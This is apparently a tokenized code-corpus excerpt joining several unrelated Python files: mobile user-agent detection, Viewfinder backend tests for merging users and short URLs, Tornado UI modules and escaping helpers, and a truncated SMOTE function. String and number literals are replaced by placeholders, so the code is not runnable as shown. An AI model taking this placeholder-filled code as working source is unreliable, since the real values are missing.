UAgentInfo . enginePie in self . __userAgent : <EOL> return True <EOL> if UAgentInfo . manuHtc in self . __userAgent and UAgentInfo . deviceWindows in self . __userAgent : <EOL> return True <EOL> if self . detectWapWml ( ) and UAgentInfo . deviceWindows in self . __userAgent : <EOL> return True <EOL> return UAgentInfo . devicePpc in self . __userAgent and UAgentInfo . deviceMacPpc not in self . __userAgent <EOL> def detectBlackBerry ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceBB in self . __userAgent or UAgentInfo . vndRIM in self . __httpAccept <EOL> def detectBlackBerryTablet ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceBBPlaybook in self . __userAgent <EOL> def detectBlackBerryWebKit ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . detectBlackBerry ( ) and self . detectWebkit ( ) <EOL> def detectBlackBerryTouch ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceBBStorm in self . __userAgent or UAgentInfo . deviceBBTorch in self . __userAgent or UAgentInfo . deviceBBBoldTouch in self . __userAgent or UAgentInfo . deviceBBCurveTouch in self . __userAgent <EOL> def detectBlackBerryHigh ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . detectBlackBerryWebKit ( ) : <EOL> return False <EOL> if not self . detectBlackBerry ( ) : <EOL> return False <EOL> return self . detectBlackBerryTouch ( ) or UAgentInfo . deviceBBBold in self . __userAgent or UAgentInfo . deviceBBTour in self . __userAgent or UAgentInfo . deviceBBCurve in self . __userAgent <EOL> def detectBlackBerryLow ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . detectBlackBerry ( ) : <EOL> return False <EOL> return self . detectBlackBerryHigh ( ) or self . detectBlackBerryWebKit ( ) <EOL> def detectPalmOS ( self ) : <EOL> """<STR_LIT>""" <EOL> if UAgentInfo . devicePalm in self . __userAgent or UAgentInfo . engineBlazer in self . __userAgent or UAgentInfo . engineXiino in self . __userAgent : <EOL> return not self . detectPalmWebOS ( ) <EOL> return False <EOL> def detectPalmWebOS ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceWebOS in self . __userAgent <EOL> def detectWebOSTablet ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceWebOShp in self . __userAgent and UAgentInfo . deviceTablet in self . __userAgent <EOL> def detectGarminNuvifone ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceNuvifone in self . __userAgent <EOL> def detectSmartphone ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __isIphone or self . __isAndroidPhone or self . __isTierIphone or self . detectS60OssBrowser ( ) or self . detectSymbianOS ( ) or self . detectWindowsMobile ( ) or self . detectWindowsPhone7 ( ) or self . detectBlackBerry ( ) or self . detectPalmWebOS ( ) or self . detectPalmOS ( ) or self . detectGarminNuvifone ( ) <EOL> def detectBrewDevice ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceBrew in self . __userAgent <EOL> def detectDangerHiptop ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceDanger in self . __userAgent or UAgentInfo . deviceHiptop in self . __userAgent <EOL> def detectOperaMobile ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . engineOpera in self . __userAgent and ( UAgentInfo . mini in self . __userAgent or UAgentInfo . mobi in self . __userAgent ) <EOL> def detectOperaAndroidPhone ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . engineOpera in self . __userAgent and UAgentInfo . deviceAndroid in self . __userAgent and UAgentInfo . mobi in self . __userAgent <EOL> def detectOperaAndroidTablet ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . engineOpera in self . __userAgent and UAgentInfo . deviceAndroid in self . __userAgent and UAgentInfo . deviceTablet in self . __userAgent <EOL> def detectWapWml ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . vndwap in self . __httpAccept or UAgentInfo . wml in self . __httpAccept <EOL> def detectKindle ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceKindle in self . __userAgent and not self . detectAndroid ( ) <EOL> def detectAmazonSilk ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . engineSilk in self . __userAgent <EOL> def detectMobileQuick ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . __isTierTablet : <EOL> return False <EOL> if self . detectSmartphone ( ) : <EOL> return True <EOL> if self . detectWapWml ( ) or self . detectBrewDevice ( ) or self . detectOperaMobile ( ) : <EOL> return True <EOL> if UAgentInfo . engineNetfront in self . __userAgent or UAgentInfo . engineUpBrowser in self . __userAgent or UAgentInfo . engineOpenWeb in self . __userAgent : <EOL> return True <EOL> if self . detectDangerHiptop ( ) or self . detectMidpCapable ( ) or self . detectMaemoTablet ( ) or self . detectArchos ( ) : <EOL> return True <EOL> if UAgentInfo . devicePda in self . __userAgent and UAgentInfo . disUpdate not in self . __userAgent : <EOL> return True <EOL> if UAgentInfo . mobile in self . __userAgent : <EOL> return True <EOL> if self . detectKindle ( ) or self . detectAmazonSilk ( ) : <EOL> return True <EOL> return False <EOL> def detectSonyPlaystation ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . devicePlaystation in self . __userAgent <EOL> def detectNintendo ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceNintendo in self . __userAgent or UAgentInfo . deviceNintendo in self . __userAgent or UAgentInfo . deviceNintendo in self . __userAgent <EOL> def detectXbox ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceXbox in self . __userAgent <EOL> def detectGameConsole ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . detectSonyPlaystation ( ) or self . detectNintendo ( ) or self . detectXbox ( ) <EOL> def detectMidpCapable ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceMidp in self . __userAgent or UAgentInfo . deviceMidp in self . __httpAccept <EOL> def detectMaemoTablet ( self ) : <EOL> """<STR_LIT>""" <EOL> if UAgentInfo . maemo in self . __userAgent : <EOL> return True <EOL> return UAgentInfo . linux in self . __userAgent and UAgentInfo . deviceTablet in self . __userAgent and not self . detectWebOSTablet ( ) and not self . detectAndroid ( ) <EOL> def detectArchos ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceArchos in self . __userAgent <EOL> def detectSonyMylo ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . manuSony in self . __userAgent and ( UAgentInfo . qtembedded in self . __userAgent <EOL> or UAgentInfo . mylocom2 in self . __userAgent ) <EOL> def detectMobileLong ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . detectMobileQuick ( ) or self . detectGameConsole ( ) or self . detectSonyMylo ( ) : <EOL> return True <EOL> return UAgentInfo . uplink in self . __userAgent or UAgentInfo . manuSonyEricsson in self . __userAgent or UAgentInfo . manuericsson in self . __userAgent or UAgentInfo . manuSamsung1 in self . __userAgent or UAgentInfo . svcDocomo in self . __userAgent or UAgentInfo . svcKddi in self . __userAgent or UAgentInfo . svcVodafone in self . __userAgent <EOL> def detectTierTablet ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . detectIpad ( ) or self . detectAndroidTablet ( ) or self . detectBlackBerryTablet ( ) or self . detectWebOSTablet ( ) <EOL> def detectTierIphone ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __isIphone or self . __isAndroidPhone or self . detectBlackBerryWebKit ( ) and self . detectBlackBerryTouch ( ) or self . detectWindowsPhone7 ( ) or self . detectPalmWebOS ( ) or self . detectGarminNuvifone ( ) <EOL> def detectTierRichCss ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . detectMobileQuick ( ) : <EOL> return False <EOL> if self . detectTierIphone ( ) or self . detectKindle ( ) : <EOL> return False <EOL> return self . detectWebkit ( ) or self . detectS60OssBrowser ( ) or self . detectBlackBerryHigh ( ) or self . detectWindowsMobile ( ) or UAgentInfo . engineTelecaQ in self . __userAgent <EOL> def detectTierOtherPhones ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . detectMobileLong ( ) and not self . detectTierIphone ( ) and not self . detectTierRichCss ( ) </s>
<s> __author__ = '<STR_LIT>' <EOL> from tornado import options <EOL> from viewfinder . backend . www . test import service_base_test <EOL> from viewfinder . backend . www . tools import merge_tool <EOL> class MergeToolTestCase ( service_base_test . ServiceBaseTestCase ) : <EOL> """<STR_LIT>""" <EOL> def testMerge ( self ) : <EOL> self . _validate = False <EOL> self . _RunAsync ( merge_tool . Merge , <EOL> self . _client , <EOL> target_user_id = self . _user . user_id , <EOL> source_user_id = self . _user2 . user_id , <EOL> base_url = self . get_url ( '<STR_LIT>' ) , <EOL> no_prompt = True ) <EOL> actual_dict = self . _tester . SendRequest ( '<STR_LIT>' , self . _cookie , { } ) <EOL> self . assertEqual ( len ( actual_dict [ '<STR_LIT>' ] ) , <NUM_LIT:2> ) </s>
<s> """<STR_LIT>""" <EOL> __authors__ = [ '<STR_LIT>' ] <EOL> import json <EOL> import mock <EOL> from tornado import options <EOL> from viewfinder . backend . base import constants , util <EOL> from viewfinder . backend . base . exceptions import TooManyRetriesError <EOL> from viewfinder . backend . base . testing import async_test <EOL> from viewfinder . backend . db . guess import Guess <EOL> from viewfinder . backend . db . short_url import ShortURL <EOL> from viewfinder . backend . www import base <EOL> from viewfinder . backend . www . short_url_base import ShortURLBaseHandler <EOL> from viewfinder . backend . www . test import service_base_test <EOL> class TestShortURLBaseHandler ( ShortURLBaseHandler , base . BaseHandler ) : <EOL> """<STR_LIT>""" <EOL> _MAX_GUESSES = <NUM_LIT:50> <EOL> def _HandleGet ( self , short_url , arg1 , arg2 ) : <EOL> self . write ( { '<STR_LIT>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT>' : short_url . group_id , <EOL> '<STR_LIT>' : short_url . random_key , <EOL> '<STR_LIT>' : short_url . timestamp , <EOL> '<STR_LIT>' : short_url . expires , <EOL> '<STR_LIT>' : arg1 , <EOL> '<STR_LIT>' : arg2 } ) <EOL> self . finish ( ) <EOL> def _HandlePost ( self , short_url , arg1 , arg2 ) : <EOL> self . write ( { '<STR_LIT>' : '<STR_LIT:POST>' , <EOL> '<STR_LIT>' : short_url . group_id , <EOL> '<STR_LIT>' : short_url . random_key , <EOL> '<STR_LIT>' : short_url . timestamp , <EOL> '<STR_LIT>' : short_url . expires , <EOL> '<STR_LIT>' : arg1 , <EOL> '<STR_LIT>' : arg2 } ) <EOL> self . finish ( ) <EOL> class ShortURLTestCase ( service_base_test . ServiceBaseTestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( ShortURLTestCase , self ) . setUp ( ) <EOL> self . _app . add_handlers ( r'<STR_LIT>' , [ ( r'<STR_LIT>' , TestShortURLBaseHandler ) ] ) <EOL> self . _short_url = self . _RunAsync ( ShortURL . Create , <EOL> self . _client , <EOL> group_id = '<STR_LIT>' , <EOL> timestamp = util . _TEST_TIME , <EOL> expires = util . _TEST_TIME + constants . SECONDS_PER_DAY , <EOL> arg1 = <NUM_LIT:1> , <EOL> arg2 = '<STR_LIT:foo>' ) <EOL> self . _url = self . get_url ( '<STR_LIT>' % ( self . _short_url . group_id , self . _short_url . random_key ) ) <EOL> def testShortURLGet ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . _RunAsync ( self . http_client . fetch , self . _url , method = '<STR_LIT:GET>' ) <EOL> self . assertEqual ( response . code , <NUM_LIT:200> ) <EOL> self . assertEqual ( json . loads ( response . body ) , { '<STR_LIT>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . _short_url . random_key , <EOL> '<STR_LIT>' : util . _TEST_TIME , <EOL> '<STR_LIT>' : util . _TEST_TIME + constants . SECONDS_PER_DAY , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' } ) <EOL> def testShortURLPost ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . _RunAsync ( self . http_client . fetch , <EOL> self . _url , <EOL> method = '<STR_LIT:POST>' , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> body = '<STR_LIT:{}>' ) <EOL> self . assertEqual ( response . code , <NUM_LIT:200> ) <EOL> self . assertEqual ( json . loads ( response . body ) , { '<STR_LIT>' : '<STR_LIT:POST>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . _short_url . random_key , <EOL> '<STR_LIT>' : util . _TEST_TIME , <EOL> '<STR_LIT>' : util . _TEST_TIME + constants . SECONDS_PER_DAY , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' } ) <EOL> @ mock . patch . object ( TestShortURLBaseHandler , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> def testMaxGuesses ( self ) : <EOL> """<STR_LIT>""" <EOL> url = self . get_url ( '<STR_LIT>' ) <EOL> response = self . _RunAsync ( self . http_client . fetch , url , method = '<STR_LIT:GET>' ) <EOL> self . assertEqual ( response . code , <NUM_LIT> ) <EOL> response = self . _RunAsync ( self . http_client . fetch , url , method = '<STR_LIT:GET>' ) <EOL> self . assertEqual ( response . code , <NUM_LIT> ) <EOL> response = self . _RunAsync ( self . http_client . fetch , self . _url , method = '<STR_LIT:GET>' ) <EOL> self . assertEqual ( response . code , <NUM_LIT> ) <EOL> url = self . get_url ( '<STR_LIT>' ) <EOL> response = self . _RunAsync ( self . http_client . fetch , url , method = '<STR_LIT:GET>' ) <EOL> self . assertEqual ( response . code , <NUM_LIT> ) <EOL> util . _TEST_TIME += constants . SECONDS_PER_DAY <EOL> response = self . _RunAsync ( self . http_client . fetch , url , method = '<STR_LIT:GET>' ) <EOL> self . assertEqual ( response . code , <NUM_LIT> ) <EOL> def testExpire ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _RunAsync ( self . _short_url . Expire , self . _client ) <EOL> response = self . _RunAsync ( self . http_client . fetch , self . _url , method = '<STR_LIT:GET>' ) <EOL> self . assertEqual ( response . code , <NUM_LIT> ) <EOL> def testShortURLErrors ( self ) : <EOL> """<STR_LIT>""" <EOL> url = self . get_url ( '<STR_LIT>' ) <EOL> response = self . _RunAsync ( self . http_client . fetch , url , method = '<STR_LIT:GET>' ) <EOL> self . assertEqual ( response . code , <NUM_LIT> ) <EOL> url = self . get_url ( '<STR_LIT>' ) <EOL> response = self . _RunAsync ( self . http_client . fetch , url , method = '<STR_LIT:GET>' ) <EOL> self . assertEqual ( response . code , <NUM_LIT> ) <EOL> util . _TEST_TIME += constants . SECONDS_PER_DAY <EOL> response = self . _RunAsync ( self . http_client . fetch , self . _url , method = '<STR_LIT:GET>' ) <EOL> self . assertEqual ( response . code , <NUM_LIT> ) <EOL> with mock . patch . object ( ShortURL , '<STR_LIT>' , <NUM_LIT:0> ) : <EOL> self . assertRaises ( TooManyRetriesError , <EOL> self . _RunAsync , <EOL> ShortURL . Create , <EOL> self . _client , <EOL> group_id = '<STR_LIT>' , <EOL> timestamp = util . _TEST_TIME , <EOL> expires = util . _TEST_TIME + constants . SECONDS_PER_DAY , <EOL> arg1 = <NUM_LIT:1> , <EOL> arg2 = '<STR_LIT:foo>' ) <EOL> def testShortDomainRedirectHandler ( self ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' % ( options . options . short_domain , self . get_http_port ( ) ) <EOL> response = self . _RunAsync ( self . http_client . fetch , url , method = '<STR_LIT:GET>' , follow_redirects = False ) <EOL> self . assertEqual ( response . code , <NUM_LIT> ) <EOL> self . assertEqual ( response . headers [ '<STR_LIT:location>' ] , '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import posixpath <EOL> from tornado import options <EOL> from tornado . web import UIModule <EOL> from viewfinder . backend . base import environ <EOL> from viewfinder . backend . resources . resources_mgr import ResourcesManager <EOL> from viewfinder . backend . www . basic_auth import BasicAuthHandler <EOL> __author__ = '<STR_LIT>' <EOL> class Header ( UIModule ) : <EOL> """<STR_LIT>""" <EOL> def render ( self , ** settings ) : <EOL> if isinstance ( self . handler , BasicAuthHandler ) : <EOL> user = self . handler . get_current_user ( ) <EOL> if user is not None : <EOL> name = user <EOL> else : <EOL> name = None <EOL> else : <EOL> name = self . handler . _GetCurrentUserName ( ) <EOL> return self . render_string ( '<STR_LIT>' , name = name , ** settings ) <EOL> def javascript_files ( self ) : <EOL> jsfiles = ResourcesManager . Instance ( ) . GetAssetPaths ( '<STR_LIT>' ) <EOL> if environ . ServerEnvironment . IsDevBox ( ) : <EOL> jsfiles . append ( '<STR_LIT>' ) <EOL> return jsfiles <EOL> def css_files ( self ) : <EOL> return ResourcesManager . Instance ( ) . GetAssetPaths ( '<STR_LIT>' ) <EOL> class Base ( UIModule ) : <EOL> """<STR_LIT>""" <EOL> def render ( self , ** settings ) : <EOL> return self . render_string ( '<STR_LIT>' , ** settings ) <EOL> def javascript_files ( self ) : <EOL> jsfiles = ResourcesManager . Instance ( ) . GetAssetPaths ( '<STR_LIT>' ) <EOL> if environ . ServerEnvironment . IsDevBox ( ) : <EOL> jsfiles . append ( '<STR_LIT>' ) <EOL> return jsfiles <EOL> def css_files ( self ) : <EOL> return ResourcesManager . Instance ( ) . GetAssetPaths ( '<STR_LIT>' ) <EOL> class Square ( UIModule ) : <EOL> """<STR_LIT>""" <EOL> def render ( self , ** settings ) : <EOL> return '<STR_LIT>' <EOL> def javascript_files ( self ) : <EOL> return ResourcesManager . Instance ( ) . GetAssetPaths ( '<STR_LIT>' ) <EOL> def css_files ( self ) : <EOL> return ResourcesManager . Instance ( ) . GetAssetPaths ( '<STR_LIT>' ) <EOL> class View ( UIModule ) : <EOL> """<STR_LIT>""" <EOL> def render ( self , ** settings ) : <EOL> return self . render_string ( '<STR_LIT>' , ** settings ) <EOL> def javascript_files ( self ) : <EOL> return ResourcesManager . Instance ( ) . GetAssetPaths ( '<STR_LIT>' ) <EOL> def css_files ( self ) : <EOL> return ResourcesManager . Instance ( ) . GetAssetPaths ( '<STR_LIT>' ) <EOL> class Admin ( UIModule ) : <EOL> """<STR_LIT>""" <EOL> def render ( self , ** settings ) : <EOL> hg_revision = environ . ServerEnvironment . GetHGRevision ( ) <EOL> return self . render_string ( '<STR_LIT>' , hg_revision = hg_revision , ** settings ) <EOL> def javascript_files ( self ) : <EOL> return ResourcesManager . Instance ( ) . GetAssetPaths ( '<STR_LIT>' ) <EOL> def css_files ( self ) : <EOL> return ResourcesManager . Instance ( ) . GetAssetPaths ( '<STR_LIT>' ) <EOL> class Script ( UIModule ) : <EOL> """<STR_LIT>""" <EOL> JS_SUBDIR = '<STR_LIT>' <EOL> def __init__ ( self , handler ) : <EOL> super ( Script , self ) . __init__ ( handler ) <EOL> self . _js_file_set = set ( ) <EOL> self . _js_files = [ ] <EOL> def render ( self , file ) : <EOL> file = posixpath . join ( self . JS_SUBDIR , file ) <EOL> if not file in self . _js_file_set : <EOL> self . _js_file_set . add ( file ) <EOL> self . _js_files . append ( file ) <EOL> return "<STR_LIT>" <EOL> def javascript_files ( self ) : <EOL> return self . _js_files <EOL> class Css ( UIModule ) : <EOL> """<STR_LIT>""" <EOL> CSS_SUBDIR = '<STR_LIT>' <EOL> def __init__ ( self , handler ) : <EOL> super ( Css , self ) . __init__ ( handler ) <EOL> self . _css_file_set = set ( ) <EOL> self . _css_files = [ ] <EOL> def render ( self , file ) : <EOL> file = posixpath . join ( self . CSS_SUBDIR , file ) <EOL> if not file in self . _css_file_set : <EOL> self . _css_file_set . add ( file ) <EOL> self . _css_files . append ( file ) <EOL> return "<STR_LIT>" <EOL> def css_files ( self ) : <EOL> return self . _css_files <EOL> class Auth ( UIModule ) : <EOL> """<STR_LIT>""" <EOL> def render ( self , prospective = False , signup_ident = None , ** settings ) : <EOL> return self . render_string ( '<STR_LIT>' , prospective = prospective , signup_ident = signup_ident , ** settings ) <EOL> def javascript_files ( self ) : <EOL> """<STR_LIT>""" <EOL> resourceManager = ResourcesManager . Instance ( ) <EOL> return resourceManager . GetAssetPaths ( '<STR_LIT>' ) + resourceManager . GetAssetPaths ( '<STR_LIT>' ) <EOL> def css_files ( self ) : <EOL> return ResourcesManager . Instance ( ) . GetAssetPaths ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , division , print_function , with_statement <EOL> import re <EOL> import sys <EOL> from tornado . util import bytes_type , unicode_type , basestring_type , u <EOL> try : <EOL> from urllib . parse import parse_qs as _parse_qs <EOL> except ImportError : <EOL> from urlparse import parse_qs as _parse_qs <EOL> try : <EOL> import htmlentitydefs <EOL> except ImportError : <EOL> import html . entities as htmlentitydefs <EOL> try : <EOL> import urllib . parse as urllib_parse <EOL> except ImportError : <EOL> import urllib as urllib_parse <EOL> import json <EOL> try : <EOL> unichr <EOL> except NameError : <EOL> unichr = chr <EOL> _XHTML_ESCAPE_RE = re . compile ( '<STR_LIT>' ) <EOL> _XHTML_ESCAPE_DICT = { '<STR_LIT:&>' : '<STR_LIT>' , '<STR_LIT:<>' : '<STR_LIT>' , '<STR_LIT:>>' : '<STR_LIT>' , '<STR_LIT:">' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> def xhtml_escape ( value ) : <EOL> """<STR_LIT>""" <EOL> return _XHTML_ESCAPE_RE . sub ( lambda match : _XHTML_ESCAPE_DICT [ match . group ( <NUM_LIT:0> ) ] , <EOL> to_basestring ( value ) ) <EOL> def xhtml_unescape ( value ) : <EOL> """<STR_LIT>""" <EOL> return re . sub ( r"<STR_LIT>" , _convert_entity , _unicode ( value ) ) <EOL> def json_encode ( value ) : <EOL> """<STR_LIT>""" <EOL> return json . dumps ( value ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def json_decode ( value ) : <EOL> """<STR_LIT>""" <EOL> return json . loads ( to_basestring ( value ) ) <EOL> def squeeze ( value ) : <EOL> """<STR_LIT>""" <EOL> return re . sub ( r"<STR_LIT>" , "<STR_LIT:U+0020>" , value ) . strip ( ) <EOL> def url_escape ( value , plus = True ) : <EOL> """<STR_LIT>""" <EOL> quote = urllib_parse . quote_plus if plus else urllib_parse . quote <EOL> return quote ( utf8 ( value ) ) <EOL> if sys . version_info [ <NUM_LIT:0> ] < <NUM_LIT:3> : <EOL> def url_unescape ( value , encoding = '<STR_LIT:utf-8>' , plus = True ) : <EOL> """<STR_LIT>""" <EOL> unquote = ( urllib_parse . unquote_plus if plus else urllib_parse . unquote ) <EOL> if encoding is None : <EOL> return unquote ( utf8 ( value ) ) <EOL> else : <EOL> return unicode_type ( unquote ( utf8 ( value ) ) , encoding ) <EOL> parse_qs_bytes = _parse_qs <EOL> else : <EOL> def url_unescape ( value , encoding = '<STR_LIT:utf-8>' , plus = True ) : <EOL> """<STR_LIT>""" <EOL> if encoding is None : <EOL> if plus : <EOL> value = to_basestring ( value ) . replace ( '<STR_LIT:+>' , '<STR_LIT:U+0020>' ) <EOL> return urllib_parse . unquote_to_bytes ( value ) <EOL> else : <EOL> unquote = ( urllib_parse . unquote_plus if plus <EOL> else urllib_parse . unquote ) <EOL> return unquote ( to_basestring ( value ) , encoding = encoding ) <EOL> def parse_qs_bytes ( qs , keep_blank_values = False , strict_parsing = False ) : <EOL> """<STR_LIT>""" <EOL> result = _parse_qs ( qs , keep_blank_values , strict_parsing , <EOL> encoding = '<STR_LIT>' , errors = '<STR_LIT:strict>' ) <EOL> encoded = { } <EOL> for k , v in result . items ( ) : <EOL> encoded [ k ] = [ i . encode ( '<STR_LIT>' ) for i in v ] <EOL> return encoded <EOL> _UTF8_TYPES = ( bytes_type , type ( None ) ) <EOL> def utf8 ( value ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( value , _UTF8_TYPES ) : <EOL> return value <EOL> assert isinstance ( value , unicode_type ) , "<STR_LIT>" % type ( value ) <EOL> return value . encode ( "<STR_LIT:utf-8>" ) <EOL> _TO_UNICODE_TYPES = ( unicode_type , type ( None ) ) <EOL> def to_unicode ( value ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( value , _TO_UNICODE_TYPES ) : <EOL> return value <EOL> assert isinstance ( value , bytes_type ) , "<STR_LIT>" % type ( value ) <EOL> return value . decode ( "<STR_LIT:utf-8>" ) <EOL> _unicode = to_unicode <EOL> if str is unicode_type : <EOL> native_str = to_unicode <EOL> else : <EOL> native_str = utf8 <EOL> _BASESTRING_TYPES = ( basestring_type , type ( None ) ) <EOL> def to_basestring ( value ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( value , _BASESTRING_TYPES ) : <EOL> return value <EOL> assert isinstance ( value , bytes_type ) , "<STR_LIT>" % type ( value ) <EOL> return value . decode ( "<STR_LIT:utf-8>" ) <EOL> def recursive_unicode ( obj ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( obj , dict ) : <EOL> return dict ( ( recursive_unicode ( k ) , recursive_unicode ( v ) ) for ( k , v ) in obj . items ( ) ) <EOL> elif isinstance ( obj , list ) : <EOL> return list ( recursive_unicode ( i ) for i in obj ) <EOL> elif isinstance ( obj , tuple ) : <EOL> return tuple ( recursive_unicode ( i ) for i in obj ) <EOL> elif isinstance ( obj , bytes_type ) : <EOL> return to_unicode ( obj ) <EOL> else : <EOL> return obj <EOL> _URL_RE = re . compile ( to_unicode ( r"""<STR_LIT>""" ) ) <EOL> def linkify ( text , shorten = False , extra_params = "<STR_LIT>" , <EOL> require_protocol = False , permitted_protocols = [ "<STR_LIT:http>" , "<STR_LIT>" ] ) : <EOL> """<STR_LIT>""" <EOL> if extra_params and not callable ( extra_params ) : <EOL> extra_params = "<STR_LIT:U+0020>" + extra_params . strip ( ) <EOL> def make_link ( m ) : <EOL> url = m . group ( <NUM_LIT:1> ) <EOL> proto = m . group ( <NUM_LIT:2> ) <EOL> if require_protocol and not proto : <EOL> return url <EOL> if proto and proto not in permitted_protocols : <EOL> return url <EOL> href = m . group ( <NUM_LIT:1> ) <EOL> if not proto : <EOL> href = "<STR_LIT>" + href <EOL> if callable ( extra_params ) : <EOL> params = "<STR_LIT:U+0020>" + extra_params ( href ) . strip ( ) <EOL> else : <EOL> params = extra_params <EOL> max_len = <NUM_LIT:30> <EOL> if shorten and len ( url ) > max_len : <EOL> before_clip = url <EOL> if proto : <EOL> proto_len = len ( proto ) + <NUM_LIT:1> + len ( m . group ( <NUM_LIT:3> ) or "<STR_LIT>" ) <EOL> else : <EOL> proto_len = <NUM_LIT:0> <EOL> parts = url [ proto_len : ] . split ( "<STR_LIT:/>" ) <EOL> if len ( parts ) > <NUM_LIT:1> : <EOL> url = url [ : proto_len ] + parts [ <NUM_LIT:0> ] + "<STR_LIT:/>" + parts [ <NUM_LIT:1> ] [ : <NUM_LIT:8> ] . split ( '<STR_LIT:?>' ) [ <NUM_LIT:0> ] . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> if len ( url ) > max_len * <NUM_LIT> : <EOL> url = url [ : max_len ] <EOL> if url != before_clip : <EOL> amp = url . rfind ( '<STR_LIT:&>' ) <EOL> if amp > max_len - <NUM_LIT:5> : <EOL> url = url [ : amp ] <EOL> url += "<STR_LIT>" <EOL> if len ( url ) >= len ( before_clip ) : <EOL> url = before_clip <EOL> else : <EOL> params += '<STR_LIT>' % href <EOL> return u ( '<STR_LIT>' ) % ( href , params , url ) <EOL> text = _unicode ( xhtml_escape ( text ) ) <EOL> return _URL_RE . sub ( make_link , text ) <EOL> def _convert_entity ( m ) : <EOL> if m . group ( <NUM_LIT:1> ) == "<STR_LIT:#>" : <EOL> try : <EOL> return unichr ( int ( m . group ( <NUM_LIT:2> ) ) ) <EOL> except ValueError : <EOL> return "<STR_LIT>" % m . group ( <NUM_LIT:2> ) <EOL> try : <EOL> return _HTML_UNICODE_MAP [ m . group ( <NUM_LIT:2> ) ] <EOL> except KeyError : <EOL> return "<STR_LIT>" % m . group ( <NUM_LIT:2> ) <EOL> def _build_unicode_map ( ) : <EOL> unicode_map = { } <EOL> for name , value in htmlentitydefs . name2codepoint . items ( ) : <EOL> unicode_map [ name ] = unichr ( value ) <EOL> return unicode_map <EOL> _HTML_UNICODE_MAP = _build_unicode_map ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import numpy as np <EOL> from sklearn . neighbors import NearestNeighbors <EOL> def smote ( T , N = <NUM_LIT:100> , k = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> if T . shape [ <NUM_LIT:0> ] <= k + <NUM_LIT:1> : <EOL> idx = np . random . choice ( T . shape [ <NUM_LIT:0> ] , size = ( k + <NUM_LIT:1> , ) ) <EOL> T = T [ idx , : ] <EOL> if N < <NUM_LIT:100> : <EOL> sz = int ( T . shape [ <NUM_LIT:0> ] * ( N / <NUM_LIT:100> ) ) <EOL> idx = np . random . choice ( T . shape [ <NUM_LIT:0> ] , size = ( sz , ) , replace = False ) <EOL> T = T [ idx , : ] <EOL> N = <NUM_LIT:100> <EOL> if N % <NUM_LIT:100> != <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> N = int ( N / <NUM_LIT:100> ) <EOL> n_minority_samples , n_features = T . shape <EOL> n_synthetic_samples = N * n_minority_samples <EOL> synthetic = np . zeros ( ( n_synthetic_samples , n_features ) ) <EOL> knn = NearestNeighbors ( n_neighbors = k ) <EOL> knn . fit ( T ) <EOL> count = <NUM_LIT:0> <EOL> for i in range ( n_minority_samples ) : <EOL> neighbors_idx = knn . kneighbors ( T [ i , : ] , n_neighbors = k + <NUM_LIT:1> , return_distance = False ) [ <NUM_LIT:0> ] [ <NUM_LIT:1> : ] <EOL> nn_idx = np . random . choice ( 